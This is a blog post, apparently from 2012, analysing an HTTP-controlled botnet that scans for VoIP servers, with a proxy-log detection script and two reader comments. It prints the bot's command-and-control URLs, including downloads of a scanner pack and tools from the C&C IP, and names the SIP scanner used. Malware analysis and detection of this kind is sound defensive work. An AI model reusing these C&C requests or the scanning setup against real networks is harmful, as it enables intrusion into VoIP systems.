casinovegas.mobi (voip scanning botnet hosted by United States Missoula Sharktech)

I found this recently and thought it was interesting enough to post.

It's an HTTP-controlled botnet used to scan for VoIP servers.

Malware actions

1. Tells the C&C server it has installed:
   208.98.52.163/90/getip.php?action=live
2. Requests an IP segment to scan:
   208.98.52.163/90/getip.php?action=get
3. Downloads and installs Python (needed for the scanner):
   hxxp://208.98.52.163/90/files/python-2.7.2.msi
4. Confirms the IP range to be scanned:
   208.98.52.163/90/insert.php?action=online&computer=USER-PC&range=95.211.169.45-95.211.199.255
5. Downloads the UnRAR utility:
   hxxp://208.98.52.163/90/files/UnRAR.exe
6. Downloads the scanner:
   hxxp://208.98.52.163/90/files/pack.rar
7. Extracts the scanning scripts and starts scanning the assigned IP range.

Discovered VoIP servers are then reported back to the C&C server, including the SIP server banner:
208.98.52.163/90/insert.php?action=insert&computer=%20USER-PC&router=127.0.0.1:5060&type=FPBX-2.8.1(1.4.44)
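The whole C&C exchange above is plain HTTP GET requests with recognisable script names and query parameters, so it is easy to spot in web proxy logs. The following is an added detection example (not code from the original post) that walks a constructed proxy log, classifies each request against the stages described above, pulls out the assigned scan range and the reported SIP banner, and counts how many hosts a bot was told to scan. The log line format (timestamp, client IP, method, URL) is an assumption made for the example.

```python
import re
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log lines (assumed format: ts client method url).
# URLs mirror the request sequence given in the post; the client IPs and
# timestamps are made up.
SAMPLE_LOG = """\
2012-11-20T10:01:02Z 10.0.0.15 GET http://208.98.52.163/90/getip.php?action=live
2012-11-20T10:01:03Z 10.0.0.15 GET http://208.98.52.163/90/getip.php?action=get
2012-11-20T10:01:09Z 10.0.0.15 GET http://208.98.52.163/90/files/python-2.7.2.msi
2012-11-20T10:02:30Z 10.0.0.15 GET http://208.98.52.163/90/insert.php?action=online&computer=USER-PC&range=95.211.169.45-95.211.199.255
2012-11-20T10:02:31Z 10.0.0.15 GET http://208.98.52.163/90/files/pack.rar
2012-11-20T10:40:00Z 10.0.0.15 GET http://208.98.52.163/90/insert.php?action=insert&computer=%20USER-PC&router=127.0.0.1:5060&type=FPBX-2.8.1(1.4.44)
2012-11-20T10:41:00Z 10.0.0.22 GET http://example.com/index.html
"""

C2_HOST = "208.98.52.163"

# (script, action) -> stage label, following the sequence described in the post.
STAGES = {
    ("getip.php", "live"): "checkin",
    ("getip.php", "get"): "range-request",
    ("insert.php", "online"): "range-confirm",
    ("insert.php", "insert"): "result-report",
}
PAYLOADS = ("python-2.7.2.msi", "UnRAR.exe", "pack.rar")

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def range_size(rng):
    """Number of addresses in an 'a.b.c.d-e.f.g.h' range string (0 if malformed)."""
    try:
        lo, hi = (ipaddress.IPv4Address(p.strip()) for p in rng.split("-", 1))
    except (ValueError, AttributeError):
        return 0
    return int(hi) - int(lo) + 1 if hi >= lo else 0


def classify(url):
    """Describe a request as a C&C stage or payload download; None if unrelated."""
    parts = urlsplit(url)
    if parts.hostname != C2_HOST:
        return None
    script = parts.path.rsplit("/", 1)[-1]
    qs = parse_qs(parts.query)
    action = qs.get("action", [None])[0]
    stage = STAGES.get((script, action))
    if stage:
        # The bot sends its hostname as 'computer'; one variant is %20-prefixed.
        event = {"stage": stage, "computer": qs.get("computer", [""])[0].strip()}
        if stage == "range-confirm":
            event["range"] = qs.get("range", [""])[0]
            event["hosts"] = range_size(event["range"])
        elif stage == "result-report":
            event["sip_target"] = qs.get("router", [""])[0]
            event["sip_banner"] = qs.get("type", [""])[0]
        return event
    if script in PAYLOADS:
        return {"stage": "payload-download", "file": script}
    return None


def scan_log(text):
    """Return the list of C&C-related events found in the log, in order."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, client, _method, url = m.groups()
        ev = classify(url)
        if ev:
            ev.update(timestamp=ts, client=client)
            events.append(ev)
    return events


if __name__ == "__main__":
    for ev in scan_log(SAMPLE_LOG):
        print(ev)
```

A single internal client producing the check-in, range-confirm and result-report stages in order is a strong indicator of an infected host; the `range` parameter tells you which external network that host was tasked with scanning, and the `type` value in the report is the SIP banner of a server the bot found.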

The scanner itself is the open-source Python tool SIPVicious: https://code.google.com/p/sipvicious/

The malware is not packed or encrypted, so some information can be recovered from its strings, including the original Visual Basic project path:
H:\Program Files (x86)\Microsoft Visual Studio\VB98\Sip Scanner\sip_scanner.vbp

Sample here

Hosting info: http://whois.domaintools.com/208.98.52.163


2 Comments

Xander Lawson - December 6, 2012 at 3:44 am

This is why we're very particular about business voip phone security at the office. You can never be too sure these days, especially when it comes to vital or sensitive information.

Anonymous - December 1, 2013 at 12:19 am

Hi, I am the owner of this domain, and we are not running this malware on our server, not that we know of. Just to be sure, we have asked our technicians to install a firewall to prevent us from being DDoSed, because we noticed that competition has done this to us. Please remove your bad comment; also, our server isn't hosted at the location you mentioned.
